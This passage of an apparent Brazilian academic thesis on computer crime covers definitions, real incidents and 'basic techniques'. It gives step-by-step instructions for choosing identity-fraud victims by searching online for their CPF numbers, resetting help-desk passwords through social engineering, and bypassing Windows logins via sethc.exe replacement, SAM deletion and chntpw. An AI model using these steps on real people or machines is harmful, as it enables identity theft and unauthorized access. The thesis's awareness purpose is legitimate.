  • 16. 16 2. Conceitos básicos e definições Para melhor entender as ideias apresentadas e evitar interpretações errôneas, torna-se necessário esclarecer alguns termos e palavras que são usadas constantemente neste trabalho, não só para auxiliar pessoas de outras áreas e que não estão acostumadas com a linguagem utilizada no mundo da informática, mas também para evitar interpretações diferentes por pessoas já familiarizadas com alguns termos. 2.1 Crime Na primeira edição do dicionário Aurélio, podemos encontrar a seguinte definição para a palavra crime: “violação culpável da lei penal; delito” (1989, p.187). Neste trabalho, é tratada como crime, não só a transgressão penal ou ação antijurídica que vai contra as leis brasileiras ou internacionais vigentes, mas também qualquer ato praticado intencionalmente e que pode trazer consequências sociais ou pessoais desastrosas ou nefastas. Um dos motivos para a adoção de tal definição é devido às leis vigentes ainda não contemplarem muitos dos atos maléficos que podem ser praticados no mundo digital. Para julgar a maioria dos crimes de informática, ainda são utilizadas leis antigas para casos novos. Por exemplo, para punir crimes como os de visualização de mensagens eletrônicas alheias, utilização de dados incorretos para preenchimento de formulários digitais e, mediante artifício ou ardil, ludibriar pessoas pela internet para benefício próprio com prejuízo alheio, são utilizadas as leis de invasão de privacidade, falsidade ideológica e estelionato, respectivamente. A adoção de leis específicas para punir crimes digitais é motivo de grande discussão, atualmente, no Brasil. 2.2 Distinções entre hacker e cracker; hackerismo e crackerismo Um equívoco frequentemente cometido por pessoas de diversas áreas não correlatas à informática é referir-se a um cracker e utilizar o termo “hacker”. Baseando-se na origem do termo, o hacker pode ser considerado como, dentre outras coisas, um bom programador, um experto em eletrônica ou um bom conhecedor de sistemas computacionais. Sobre o cracker, não é frequente que haja discórdia nas definições para o termo, tornando o significado da palavra pouco menos claro se comparado ao hacker. Ainda não é comum que definições para o termo sejam encontradas em dicionários (principalmente os brasileiros), porém, é possível
  • 17. 17 encontrar em alguns específicos de informática. Segundo Carlos Eduardo Morimoto, Existem duas definições diferentes para este termo. Na primeira, o cracker é um vândalo virtual, alguém que usa seus conhecimentos para invadir sistemas, quebrar travas e senhas, roubar dados [..] Uma segunda definição, mais branda, é alguém que quebra travas de segurança de programas e algoritmos de encriptação, seja para poder rodar jogos sem o CD-ROM, ou gerar uma chave de registro falsa para um determinado programa, quebrar as travas anti-cópia [SIC] usadas em alguns softwares, quebrar o sistema de encriptação do DVD (este último realmente importante, pois permitiu que os usuários do Linux e outros sistemas não Windows pudessem assistir DVDs). Ou seja, nesta segunda definição o Cracker é alguém na margem da lei, cujas ações ainda são ilegais, embora muitas vezes eticamente justificáveis (os usuários têm direito a fazer cópias de CDs legalmente comprados, tem [SIC] direito de assistir DVDs no Linux e assim por diante) (2002, p.134). Enfatizando as afirmações de Morimoto, é possível dizer que as definições que encontramos para o termo cracker não costumam ser muito diferentes umas das outras, visto que, quem não conhece as diferenças entre um hacker e um cracker, como muitos jornalistas não especializados em notícias de informática, frequentemente referem-se ao cracker e utilizam o termo “hacker”. O termo “hacker” pode ainda ser ramificado em diversas outras terminologias como o Black hat, White hat, Phreaker, Coder e várias outras, dependendo do tipo de hacker. Tais terminologias não são utilizadas neste documento, portanto, não há necessidade de explicá-las para o entendimento do conteúdo. No dicionário de internet e informática, de Márcia Regina Sawaya, os hackers são: “programadores tecnicamente sofisticados, que dedicam boa parte de seu tempo a conhecer, dominar e modificar programas e equipamentos.” (1999, p. 208). Há uma imensa quantidade de dicionários e sites na internet que definem estes termos, portanto, estabelecer uma definição exata é algo complexo. Segundo Morimoto, “a confusão é tanta que existem casos de livros e mesmo filmes legendados, onde o termo "Cracker" é substituído por "Hacker" pelo tradutor, sem a menor cerimônia.”(2002, p.198). Para evitar interpretações equivocadas neste trabalho, devem ser levadas em conta as seguintes definições para quando são citadas as palavras hacker, hackerismo, cracker e crackerismo: Hacker: Pessoa com elevado conhecimento técnico em determinada área (no caso deste trabalho, conhecimento em informática);
  • 18. 18 Hackerismo: Corrente ou doutrina que um hacker segue; Cracker: Perito em informática que, muitas vezes, utiliza-se de seu conhecimento para praticar ações criminosas e/ou que vão contra as leis penais; Crackerismo: Corrente ou doutrina que um cracker segue. 2.3 Firewall Esta palavra, cuja tradução literal é “parede de fogo”, será bastante utilizada no texto, portanto, seu entendimento é fundamental para a perfeita compreensão do conteúdo. O firewall pode ser um software que, após ser instalado e configurado em um computador, tem a função de bloquear acessos e conexões suspeitas ou previamente bloqueadas. Além de um software, um firewall pode ser um componente dedicado exclusivamente para analisar o tráfego e controlar os acessos que são permitidos ou não. Em médias e grandes empresas, são utilizados equipamentos cuja única função é a de firewall, o que evita a lentidão na rede e permite maior precisão no controle de acesso. A definição abaixo, além de breve e simples, permite o entendimento básico do conceito de firewall. "Programa ou componente dedicado, que protege a rede contra invasões externas e acessos não autorizados.” (MORIMOTO, 2002, p.181). 2.4 “Laranja” Não foi encontrada nenhuma outra palavra mais formal e que não tenha sentido figurado para reproduzir fielmente o significado deste termo. Quando a palavra “laranja” é mencionada nesta pesquisa, ela tem o seguinte significado: Indivíduo, nem sempre ingênuo, que ajuda, de forma involuntária ou não, com seu nome e/ou dados pessoais, na concretização de um crime, recebendo o ônus total ou parcial. 2.5 Segurança em ambientes corporativos O nível de segurança implantada em uma empresa deve ser diretamente proporcional
  • 19. 19 ao valor de seus ativos e o grau de risco a que eles estão expostos. No mercado, podemos encontrar diversas soluções de segurança voltadas para o ambiente corporativo que incrementam a segurança dos sistemas. Muitas vezes, tais soluções são realmente necessárias, porém, tratadas como opcionais. A maioria das técnicas apresentadas neste trabalho, consideradas técnicas de lammers ou script kiddies (iniciantes), podem ser facilmente bloqueadas com soluções simples. Dos iniciantes, geralmente, apenas uma boa configuração é suficiente para se prevenir, o que não exige a aquisição de programas ou equipamentos. A segurança em empresas (mesmo nas pequenas) deve ser diferenciada. Para manter a segurança nas empresas, algumas medidas genéricas, básicas e importantes são: -Aquisição e atualização periódica de antivírus corporativo; -Configuração personalizada de firewall; -Atualização dos programas e sistemas operacionais da empresa; -Adoção de políticas de segurança e conscientização de funcionários. As medidas supracitadas são recomendadas a qualquer tipo e porte de empresa. Medidas adicionais, entretanto, podem e devem ser tomadas de acordo com a realidade de cada empresa. Devido às técnicas avançadas e requintadas que alguns criminosos utilizam, somente instalar um antivírus e manter o computador atualizado não são medidas que garantam a segurança de nossas redes. 2.6 Conscientização A conscientização dos usuários domésticos e corporativos sobre a necessidade de tomar medidas que garantam a segurança dos sistemas é, indubitavelmente, o maior desafio encontrado para garantir a integridade, confidencialidade e disponibilidade de informações. Tal afirmação pode ser comprovada com dados de diversas pesquisas, como a Décima pesquisa nacional de segurança de informação feita pela empresa de segurança “Módulo Security Solutions”. Na figura abaixo, extraída desta pesquisa, é possível verificar os dados de aproximadamente 600 questionários presenciais e on-line, nos quais foram ouvidos profissionais da área de tecnologia e segurança de informação, distribuídos pelos diversos setores da economia. Os dados correspondem à metade das mil maiores empresas brasileiras.
  • 20. 20 Principal obstáculo para a implementação de segurança. Figura 1. Fonte: Módulo Security Solutions (2002, p.7). 2.7 Obtenção de dados Um dos fatores que mais possibilitam pessoas mal intencionadas cometerem crimes de informática é a exposição de dados. Há diversos dados que um criminoso pode utilizar para cometer um crime. Com o auxílio de um computador, muitos deles podem ser encontrados como: dados cadastrais que circulam livremente na internet, identificações únicas em processadores e placas de rede, logs (arquivos que armazenam dados sobre o que acontece em um sistema), histórico de navegação, cookies (documentos de texto armazenados pelos navegadores), lista de documentos recentes, mensagens de comunicadores instantâneos e até mesmo documentos do pacote de programas Microsoft Office que armazenam informações sobre quem criou o documento (THOMPSON, 2004). Atualmente, uma das melhores formas de se conseguir informações são os sites de busca na internet. Através deles, é possível obter informações das mais diversas sobre várias pessoas que nem imaginam ter seu nome exposto na internet Estas informações são frequentemente oriundas de cadastros feitos em sites ou, até mesmo, cadastros feitos em estabelecimentos físicos. Não são só dados cadastrais que circulam pela internet. Segundo Rafael Sbarai em um artigo publicado na revista Veja, em abril de 2010, o Facebook, uma das maiores redes sociais
  • 21. 21 do mundo (supera a marca de 400 milhões de usuários), em sua décima sétima mudança nas políticas de privacidade, tornou públicos os dados de todos os seus usuários. Dentre as informações contidas nestes dados estão: nome, profissão, cidade, lista de amigos e álbum de fotos. Ainda de acordo com a reportagem, as autoridades de proteção de dados da União Europeia consideraram esta abertura como “inaceitável” (SBARAI, 2010). Além das fontes já citadas, também é possível encontrar informações de alto valor em sites como: http://telelistas.net/, http://www.previdenciasocial.gov.br/, http://www.detran.sp.gov.br/, http://www.registro.br/, http://www.whois.net/, https://registro.br/cgi-bin/whois/ e muitos outros. 2.8 Como os criminosos escolhem um “laranja” A escolha de um “laranja” é extremamente útil para um criminoso cometer diversos tipos de crimes tornando-se requisito básico para quem não quer ser descoberto. Há diversos métodos de se escolher um” laranja”. Uma das formas mais simples é utilizar sites de busca na internet para conseguir dados de pessoas com o nome limpo. A quantidade de dados e a facilidade de obtê-los possibilitam ao criminoso escolher até mesmo que nome ele quer utilizar. No exemplo a seguir, foi utilizado um navegador comum para entrar no site “www.google.com.br” e, supondo que o criminoso tenha escolhido um nome comum como “Mario”, foi digitado o seguinte: "CPF: " Mario. Resultados da pesquisa para o termo "CPF: " Mario. Figura 2
  • 22. 22 Na imagem anterior é possível observar que, logo nos três primeiros resultados da busca, o criminoso pode achar algo que possivelmente lhe interesse. O primeiro resultado mostra até mesmo o endereço (além do CPF) de um Mário que possivelmente mora em Minas Gerais. No segundo, é possível verificar um site do governo federal divulgando informações pessoais de diversas pessoas para, literalmente, quase o mundo inteiro. No terceiro resultado, mais uma vez é possível visualizar o nome, CPF e endereço de outra pessoa que se chama Mario. Após a rápida obtenção destes dados, o criminoso pode entrar no site “http://www.receita.fazenda.gov.br/aplicacoes/atcta/cpf/consultapublica.asp” e verificar a situação cadastral do CPF para não correr o risco de ter algum insucesso ao cometer fraudes devido a problemas com o documento. Com o nome completo da pessoa e outros dados pessoais, muitas vezes é possível encontrar em outros sites diversas informações do futuro “laranja”. Caso o criminoso queira ir mais além, pode escolher um “laranja” que tenha mais ou menos sua idade (preferencialmente de outro estado), fazer um boletim de ocorrência passando-se pelo “laranja” em alguma delegacia dizendo que foi assaltado e teve todos os seus documentos roubados, e começar a providenciar, legalmente, novos documentos. O criminoso pode conseguir uma certidão de nascimento em um cartório e, levando em consideração que a carteira de identidade é de responsabilidade dos governos estaduais e válida em todo o território nacional, de posse da certidão de nascimento e quatro fotos, a pessoa com más intenções pode tentar fazer a carteira de identidade em algum estado que não adotou o novo documento com chip e banco de dados integrado de impressões digitais (SIQUEIRA, 2010). Após conseguir documentos como RG, CPF e certidão de nascimento, todos eles expedidos por órgãos oficiais, é possível obter ainda mais documentos, alugar temporariamente uma casa, abrir conta em banco, obter empréstimos, fazer compras e, posteriormente, descartar todos os documentos do “laranja” e voltar para seu estado de origem com os bens adquiridos, agindo como se nada tivesse acontecido. Possivelmente, a pessoa lesada só irá perceber o que aconteceu quando for investigar o motivo de seu nome estar “sujo”. Mesmo se conseguir provar que não fez compras ou pegou empréstimos, terá muitos problemas para reparar todo o dano causado. Com o exemplo acima é possível concluir que, se nenhum site na internet tratasse dados pessoais como se fossem informações públicas, o criminoso não teria tanta facilidade para agir. O exemplo também permite afirmar que não é necessário um elevado conhecimento em informática para utilizar a tecnologia como ferramenta principal, na hora de cometer um
  • 23. 23 crime. Outras artimanhas menos conhecidas também podem ser utilizadas para escolher um “laranja” a fim de realizar de crimes difíceis de serem investigados. Muitas pessoas compram equipamentos como dispositivos de rede sem fio e apenas ligam o aparelho, preservando as configurações originais de fábrica. Por padrão, a grande maioria desses dispositivos não possui qualquer configuração de segurança como, por exemplo, uma senha de acesso. Uma pessoa com conhecimentos superficiais de informática pode, sem dificuldade alguma, utilizar a conexão que o dono do aparelho possui com a internet e praticar atividades como, por exemplo, acessar sites de pornografia infantil. Neste caso, o acesso pode ser rastreado pela polícia e, a pessoa que primeiramente será encontrada é a dona do equipamento sem fio. Mesmo se for definida uma senha para acesso lógico ao equipamento, uma pessoa com conhecimentos intermediários em redes sem fio pode facilmente descobrir a senha se ela não for complexa e de um padrão de tecnologia (protocolo) seguro. Mesmo uma pessoa que não possui equipamentos de rede sem fio, mas mantém seu computador desatualizado, muitas vezes com vírus, também pode, com grande facilidade, tornar-se um “laranja” tendo seu computador invadido. Outra forma de se utilizar um “laranja”, bastante verificada em empresas, é realizar um procedimento chamado e-mail spoofing. Esta técnica consiste em forjar um e-mail, muitas vezes com um remetente que é conhecido da pessoa que recebe. Um exemplo de como esta técnica pode ser utilizada é um criminoso utilizar o endereço de e-mail de algum funcionário de uma empresa, passando-se por ele, e tentar obter alguma informação que poucas pessoas conseguiriam. 2.9 Exemplos reais de crimes Os crimes de informática, dos mais brandos aos mais nefastos, acontecem com grande frequência em vários países e empresas com diferentes níveis de segurança. A grande maioria das pessoas não dá a importância devida às notícias ou, muitas vezes, nem fica sabendo delas. Os bancos, por exemplo, não costumam divulgar seus incidentes de segurança por razões óbvias – quem confiaria seu dinheiro a um banco declaradamente inseguro? –, porém, é possível encontrar diversos relatos pessoais e não formais. Por exemplo, se a frase ”Caixa eletrônico do Banco invadido por hackers”, for digitada no campo de busca do maior site de compartilhamento de vídeos do mundo, será mostrado um vídeo onde há um caixa eletrônico
  • 24. 24 de uma instituição financeira brasileira de grande porte com a imagem de uma mulher nua. Uma suposta vítima de fraude filmou o caixa eletrônico e narrou o fato possivelmente ocorrido. Para dar mais credibilidade às hipóteses e exemplos citados ao longo deste trabalho, foram extraídas de jornais respeitados, tribunais de justiça e revistas, algumas notícias que podem confirmar as afirmações do parágrafo acima. 2.9.1 Incidentes envolvendo bancos O banco Bradesco S/A foi condenado pelo Tribunal de Justiça de Minas Gerais a indenizar um advogado que sofreu uma invasão cracker e teve um prejuízo de R$ 8.626,31. O advogado obteve direito de ressarcimento do valor, além de uma indenização por danos morais no valor de R$ 5.800. Assim que percebeu algo de errado com sua conta, o advogado contatou o gerente do banco e foi informado de que nada poderia ser feito. O advogado então registrou um boletim de ocorrência, notificou oficialmente a agência e, segundo ele, o banco não respondeu aos apelos. Em sua defesa, o banco Bradesco declarou que a vítima possibilitou que terceiros tivessem acesso à sua senha de uso pessoal e intransferível, além de declarar que o sistema de segurança do banco é infalível (TRIBUNAL DE JUSTICA DE MINAS GERAIS, 2010). Um cracker brasileiro de 24 anos foi preso no dia 04/06/2010 após pedir US$ 500 mil a um banco de investimentos de São Paulo para evitar o roubo de US$ 2 milhões. O cracker enviava e-mails para o banco com informações sigilosas (para provar que tinha acesso ao sistema) e passava um número de celular para contato (o celular foi comprado com os dados de um dos diretores da empresa). O grande erro do cracker foi comparecer pessoalmente para receber o dinheiro na sede do banco localizado na AV. Paulista, em São Paulo, onde agentes do Departamento de Investigações Sobre Crime Organizado (DEIC) prenderam o criminoso (AGÊNCIA DO ESTADO, 2010). 2.9.2 Invasões No dia 30 de maio de 2010, um domingo, o site da Ordem dos Advogados do Brasil (OAB) foi invadido e ficou com uma imagem dizendo ser de autoria dos “Brazilians Defacers” e contendo trocadilhos, palavras de baixo calão e frases de repúdio ao governo do
  • 25. 25 Presidente Lula. A imagem permaneceu no site até às 21h do domingo e, posteriormente, o site ficou em manutenção (PAVARIN, 2010). Nem quem comanda o país está imune. Logo após o Partido dos Trabalhadores (PT) ter ficado mais de 24 horas com seu site fora do ar em um final de semana devido a um problema decorrente de uma invasão e, também por mais de 24 horas o Partido do Movimento Democrático Brasileiro (PMDB) ficar com o site indisponível pelo mesmo problema, no dia 19/04/2010, outro domingo, o site do Partido da Social Democracia Brasileira (PSDB) também foi invadido. No fim de semana, o cracker invadiu o site por pelo menos duas vezes e acrescentou a frase “Partido dos corruptos” na página inicial. Após algum tempo, o internauta era direcionado automaticamente para uma página de autoria do cracker que expunha 40 propostas para o Brasil. O site ficou indisponível toda a madrugada do sábado para o domingo, foi colocado em funcionamento novamente ao meio-dia, quando sofreu um novo ataque. Por volta das 20h da segunda-feira o site ainda encontrava-se indisponível (URIBE, 2010). 2.9.3 Sequestro Em meados de 2010, um jovem de 19 anos foi sequestrado e mantido em cativeiro durante cinco dias em Ilha Comprida (SP), tendo sua família aterrorizada pelos sequestradores que, em um dos piores momentos da negociação, foi questionada, pelo sequestrador, se gostaria de receber o dedo ou a orelha do jovem como um “presente”. Felizmente, o estudante foi libertado pela polícia e os nove integrantes da quadrilha foram presos. Para este trabalho acadêmico, o fato mais relevante a ser analisado no caso de sequestro acima descrito é a forma como a quadrilha escolhia suas vítimas. A polícia informou que os sequestradores passavam horas em sites de relacionamento na internet à procura de pessoas com sinais de riqueza. Em outras palavras, a internet servia como uma ferramenta para os criminosos localizarem pessoas monetariamente favorecidas, além de descobrir o comportamento das vítimas (horário de entrada e saída de casa, entre outras informações). O pai do estudante sequestrado reconheceu que o filho expôs informações demais na internet (G1SP, 2010).
  • 26. 26 3 Técnicas e conhecimentos básicos Popularmente conhecidas como “receitas de bolo”, algumas técnicas que necessitam de pouco ou nenhum conhecimento de informática podem ser utilizadas para obter acessos não autorizados, danificar sistemas, obter ganhos financeiros, descobrir informações sigilosas ou, entre as diversas aplicações possíveis, ajudar em algum dos passos dados durante a realização de um ataque. Uma das primeiras coisas que um cracker aprende ou procura aprender é como quebrar senhas. Senhas de sistemas amplamente utilizados (como o Windows) têm suas brechas frequentemente exploradas; muitas vezes as brechas encontradas permanecem abertas durante anos. É comum que bancos e sistemas que necessitam de segurança em nível elevado, utilizem outras formas de autenticação de usuários privilegiados para a liberação de acessos, como, por exemplo, autenticações biométricas, tokens (dispositivos que geram senhas diferentes após um tempo determinado) e cartões magnéticos. Ainda assim, em sistemas 100% lógicos, a senha ainda é a forma mais utilizada para garantir que o solicitante do acesso seja realmente a pessoa autorizada a acessar. 3.1 Engenharia social Com o avanço da tecnologia e algoritmos de criptografia, a quebra de senhas por métodos puramente técnicos nem sempre é a melhor opção. Uma das falhas mais explorada em casos de emprego de tecnologias avançadas para controle de acessos é a falha humana. Em um sistema corporativo, obter acesso a um sistema somente com a engenharia social, pode ser um procedimento relativamente simples. Toda grande empresa tem um sistema de suporte ao usuário (chamado de Help Desk ou Service desk) que, em sua maioria, adota padrões de segurança. Para o controle de acesso e proteção das senhas, uma ação adotada por boa parte dos serviços de suporte aos usuários dos sistemas corporativos é a solicitação de dados pessoais de seus funcionários antes de fazer a troca (reset) de uma senha. Em grandes empresas, as senhas são frequentemente esquecidas pelos funcionários, o que torna o trabalho de troca de senhas uma ação normal e constante por parte dos analistas de suporte ao usuário ou pelos responsáveis por esta tarefa. Uma empresa que solicita somente o número do CPF ou outro documento de um usuário antes de trocar sua senha, pode ter seu
  • 27. 27 sistema de segurança facilmente burlado. Para exemplificar o uso da engenharia social que pode ser feito neste caso, é possível descrever um cenário no qual um funcionário (mais conhecido como insider) foi pago por uma concorrente para obter informações sigilosas que foram enviadas para a caixa de correio eletrônico de seu chefe ou diretor. O funcionário criminoso pode utilizar a internet ou algum outro meio para conseguir o CPF do titular da conta de e-mail e, simplesmente, ligar para o help desk, dizer que esqueceu a senha, confirmar os dados da vítima e obter uma nova senha. A desvantagem deste processo é que a possibilidade de a vítima rapidamente descobrir que há algo de errado com sua conta de e- mail é muito alta, o que obriga o criminoso a, assim que conseguir o acesso, copiar o mais rápido possível as informações que podem ser úteis. 3.2 Outras formas de ligar o computador Com acesso físico a um computador, a tarefa de investigá-lo, danificá-lo ou qualquer outra prática torna-se, obviamente, mais fácil. Obtendo-se o acesso físico ao computador e um pen- drive, é possível descobrir senhas, visualizar arquivos e até mesmo apagar todo o conteúdo armazenado. Quando um computador comum é iniciado, primeiro são executadas instruções básicas para o funcionamento do sistema e só depois disso é acessado o local onde está o sistema operacional (como um HD com o Windows) e o computador continua a carregar os arquivos armazenados. Na maioria dos computadores é disponibilizada uma opção para o usuário escolher a partir de qual local ele deseja que o sistema seja carregado. Para obter acesso total ao computador e a tudo o que nele está instalado, uma boa solução é utilizar sistemas operacionais paralelos ou sistemas que inicializam a partir de CD/DVD, pen-drives ou a partir da rede. Sistemas operacionais paralelos nada mais são do que outros sistemas operacionais instalados no mesmo computador. Sistemas que inicializam a partir de CD/DVD (também conhecidos como Live-CDs), são sistemas operacionais, geralmente completos, que em sua grande maioria não alteram nenhuma configuração no computador e deixam poucos ou nenhuns rastros. Para inicializar um computador sem a necessidade de carregar o Windows, por exemplo, basta fazer o download de uma distribuição Live-CD do Linux, e configurar o computador para que inicie a partir do CD. As opções de inicialização (chamadas de opções de Boot)
  • 28. 28 costumam variar pouco de computador para computador e, para acessá-las, deve-se digitar uma tecla que varia entre o F2, Delete, Esc, F6, F8 e F10, logo que o computador é ligado (antes de o sistema operacional ser carregado). Neste trabalho, para exemplificar alguns ataques, é utilizada a quarta versão da distribuição Back-Track do Linux. Esta distribuição foi especialmente criada para a realização de testes de penetração, porém, outras podem ser utilizadas. Há também a possibilidade de iniciar sistemas a partir de pen-drives e Live-CDs baseados em sistemas Windows, que podem ser facilmente encontrados digitando-se os termos “boot pendrive” e “Windows PE” nos sites de busca. Também é possível obter acesso total ao sistema com alguns CDs de instalação, como, por exemplo, o DVD de instalação do Windows Vista. Para visualizar, copiar ou apagar algum arquivo a partir de um DVD de instalação do Windows Vista é necessário configurar o computador para que inicie pelo DVD e então aparecerá a mensagem para apertar uma tecla para iniciar a partir do CD ou DVD. Ao apertar uma tecla qualquer, o sistema começará a carregar o programa de instalação. Após esta etapa, irá aparecer a tela para a escolha do idioma e, ao clicar em “Avançar”, o sistema trará as opções de instalar o Windows ou reparar o computador. A opção de reparar o computador deve ser escolhida e, após a exibição da tela apresentando a instalação a ser reparada, será mostrada a janela de recuperação do sistema, com várias opções, inclusive o acesso às linhas de comando com opções de administrador, como na figura abaixo. Tela de recuperação retirada do DVD do Windows Vista. Figura 3
  • 29. 29 3.3 Obter acesso completo a sistemas Windows protegidos por senha A grande maioria dos sistemas operacionais (como o MAC OS, Linux, Unix, etc.) possuem graves brechas de segurança, porém, devido à quantidade de usuários dos sistemas Windows, ele é o mais explorado. Há variadas formas de se conseguir elevação de privilégios em sistemas operacionais Windows. As mais óbvias e conhecidas são a exclusão ou descoberta de senhas de usuários administradores. Porém, há outras formas de conseguir acesso de administrador, como a utilização de outras contas nativas do Windows a exemplo da conta “system” (com mais privilégios que a conta de administrador), a conta de convidado (geralmente limitada) e a utilização de programas que utilizam outras contas mesmo quando executados por usuários com acesso limitado. Das técnicas mencionadas, talvez a mais utilizada e conhecida para obter acesso privilegiado a sistemas Windows é usufruir da conta “system”. Uma forma de utilizá-la é executar o programa que terá privilégios de sistema antes de algum usuário efetuar o logon (acesso ao sistema). Um exemplo de como isso pode ser feito é utilizar a proteção de tela ou as teclas de atalho do Windows, pois elas podem ser ativadas antes de algum usuário digitar seus dados e acessar o sistema (tela de logon). Quando configurada, a proteção de tela entra automaticamente após certo período de tempo e o programa responsável por sua execução é o “Logon.scr”, que fica em C:WindowsSystem32 e, em versões mais antigas do Windows, os arquivos de proteção de tela são os com extensão “.SCR” e costumam ficar na pasta C:WINDOWSSYSTEM. A proteção de tela encontra-se habilitada na maioria dos sistemas Windows e, quando executada, no caso dos sistemas mais novos, qualquer programa que tenha o nome “Logon.scr” e estiver dentro da pasta C:WindowsSystem32 será executado. Uma desvantagem de utilizar a proteção de tela para obter acesso não autorizado é que nem sempre ela está ativada e, mesmo quanto está, é necessária a espera de alguns minutos ou até horas para a execução do programa. A utilização das teclas de atalho do Windows para a execução de programas a partir da conta “system” mostra-se mais eficaz devido ao fato de ser possível sua execução a qualquer momento (basta apertar a tecla Shift por cinco vezes) e por estar habilitada em praticamente todos os sistemas operacionais Windows. Na prática, para utilizar as teclas de atalho a fim de executar um programa com acessos de sistema, deve-se renomear ou apagar o arquivo “sethc.exe”, que fica localizado no diretório
  • 30. 30 C:WindowsSystem32, deixar dentro deste diretório o arquivo que queremos executar e renomear o novo programa para “sethc.exe”, conforme a figura a seguinte. Prompt de comando (cmd.exe) renomeado para “sethc.exe”. Figura 4 No figura acima, é possível visualizar o console de comandos do Windows (prompt de comando; Programa “cmd.exe”) renomeado para “sethc.exe”. O prompt de comando fica localizado no mesmo diretório do programa de teclas de atalho. A partir dele, é possível realizar diversas ações. No exemplo do sistema acima, a qualquer momento em que a tecla Shift for pressionada por cinco vezes consecutivas, será aberta uma janela para a inserção de linhas de comando. As teclas de atalho funcionam mesmo antes de algum usuário efetuar o logon (visando a acessibilidade de usuários com necessidades especiais). Portanto, caso as alterações acima sejam feitas da maneira correta e a tecla Shift for pressionada por cinco vezes consecutivas na tela de logon, será aberta uma janela do prompt de comando com mais privilégios que a conta de administrador do sistema.
  • 31. 31 Na figura abaixo, o prompt de comandos foi utilizado para trocar a senha de um usuário com o comando “net user nome_do_usuário senha_desejada”. Alteração da senha. Figura 5 Alguns sistemas mais seguros substituem automaticamente o arquivo “sethc.exe”, por um novo, devido ao fato de ele ser um arquivo do sistema. Para resolver esse problema é preciso renomear rapidamente o novo arquivo antes da substituição. A pessoa com intenções de burlar o sistema também pode fazer a substituição do arquivo através de um Live-CD com opção de escrita, caso não possua nem mesmo uma conta limitada no computador da vítima. Esta técnica já é antiga e conhecida, porém, ainda funciona no mais novo sistema operacional da Microsoft, o Windows 7, que não teve a falha corrigida. O único possível problema que pode ocorrer no Windows Vista/7 é o sistema não permitir que o arquivo seja renomeado. Neste caso, é preciso alterá-lo a partir de um Live-CD ou tornar-se dono do arquivo e liberar as permissões. Para obter a propriedade sobre o arquivo e, posteriormente, liberar as permissões de escrita, é preciso seguir os seguintes passos: - Clicar com o botão direito sobre o arquivo “sethc.exe”, selecionar as propriedades, clicar na aba segurança e, posteriormente, no botão “ Avançadas”.
  • 32. 32 Obter propriedade de arquivo. Figura 6 -Na janela que aparecer, é preciso selecionar a aba proprietário e clicar no botão editar. Obter propriedade de arquivo (2). Figura 7
  • 33. 33 Ao clicar em “Editar”, aparecerá a tela para modificar o proprietário do arquivo. Basta escolher o novo proprietário, clicar em aplicar e em OK. Obter propriedade de arquivo (3). Figura 8 Após obter a propriedade do arquivo, o último passo é liberar as opções de escrita no arquivo para que seja possível renomeá-lo ou apagá-lo. Para isso, é necessário clicar novamente com o botão direito do mouse em “sethc.exe”, selecionar a opção “Propriedades”, aba “Segurança”, botão “Editar”, selecionar o usuário, liberar as permissões, clicar em “Aplicar” e “Yes”. Obtendo permissões. Figura 9
  • 34. 34 3.3.1 Senhas do Windows 95,98 e Millennium Em versões antigas como as de 95, 98 e a Millennium, para acessar um sistema com senha, bastava clicar em cancelar na tela que solicitava a senha para acesso ao sistema. Algumas medidas de segurança podiam ser tomadas para incrementar a segurança, mas parte das medidas poderia ser fechada ao se pressionar as teclas Ctrl+Alt+Delete no teclado e escolhendo a opção de finalizar tarefa, a fim de encerrar o programa que bloqueava o acesso ou apagar os arquivos com o nome do usuário e extensão “PWL”, localizados em “C:WINDOWS” (OLIVEIRA, 2000). Na figura abaixo, é possível verificar a tela de um computador com o Windows Millennium, no qual há somente um usuário (chamado PI) com senha. Para deixar o sistema sem senha de acesso, basta apagar o arquivo. Tela do Windows Millennium. Figura 10 3.3.2 Senhas do Windows NT e 2000 Até mesmo as versões NT e 2000, consideradas mais seguras, podem ter todas as suas senhas e contas de usuários apagadas, somente com a exclusão de arquivos. No caso destes sistemas, o arquivo com informações de usuários e senhas é o arquivo SAM localizado na pasta C:WINNTsystem32config. Para excluir as contas de usuários e suas respectivas senhas, basta apagar três arquivos: na pasta C:WINNTsystem32config os arquivos SAM e SAM.LOG e, na pasta C:winntrepair, o arquivo SAM. A diferença dos sistemas baseados no Windows NT é não ser possível a exclusão de arquivos de senhas com o sistema funcionando e sem nenhuma ferramenta especial, pois o arquivo fica em uso. A solução é apagá-los com outro sistema operacional instalado no computador, utilizando um Live-cd, pen-drive com o Linux ou Windows instalado ou o CD de instalação de algum sistema operacional.
  • 35. 35 3.3.3 Senhas do Windows XP, 2003, Vista e 7 No caso dos sistemas operacionais mais recentes da Microsoft, apagar ou trocar senhas dos usuários ou administradores do sistema sem possuir uma conta, é uma tarefa que exige a utilização de diferentes procedimentos ou ferramentas, pois não se resume em excluir arquivos. Uma das formas mais simples de se obter acesso às contas de administrador em sistemas operacionais Windows mais novos é utilizar algum CD de inicialização que contenha ferramentas para realizar tal tarefa. Uma boa opção é o “Ultimate Boot CD (UBCD)” ou o “Hiren´s BootCD”. Há também ferramentas mais avançadas e com diversas opções para a manipulação de senhas e usuários em sistemas Windows. Para exemplificar o uso de ferramentas com opções avançadas, utilizaremos o programa “chntpw” que, por padrão, já vem instalado na distribuição “BackTrack” – do Linux. Dentre as opções que o “chntpw” oferece estão: editar o registro do Windows, editar opções do console de recuperação, manipular senhas de usuários, desbloquear contas e incluir uma conta limitada no grupo dos administradores. Vale lembrar que, para alterar corretamente uma senha em sistemas Windows mais atuais, é preciso uma informação (hash) do arquivo “system” que fica no mesmo diretório do arquivo “SAM”. O procedimento de troca de senha é pouco mais complexo, portanto, apenas será explicado como é feito para apagar a senha de uma conta de um usuário do sistema. Caso seja necessário colocar uma nova senha, basta acessar a conta (que estará sem senha) e adicionar uma. Com o “BackTrack 4” iniciado a partir de um CD, DVD ou pendrive, é possível acessar um HD com a instalação do Windows utilizando os seguintes comandos: cd / mkdir /media/teste mount dev/hda1 /media/teste O último comando deve ser modificado para “mount dev/sda1 /media/teste” caso o disco rígido do computador utilize a tecnologia Serial Advanced Technology Attachment (SATA). Em casos de problemas com o acesso ao disco rígido que contém a instalação do Windows, pode ser necessário forçar a montagem da partição. O seguinte comando pode ser utilizado para forçar a montagem da partição: mount -t ntfs-3g /dev/hda1 /media/teste -o force Após a obtenção de acesso ao local onde o Windows está instalado, é possível verificar as opções de manipulação do sistema com o comando:
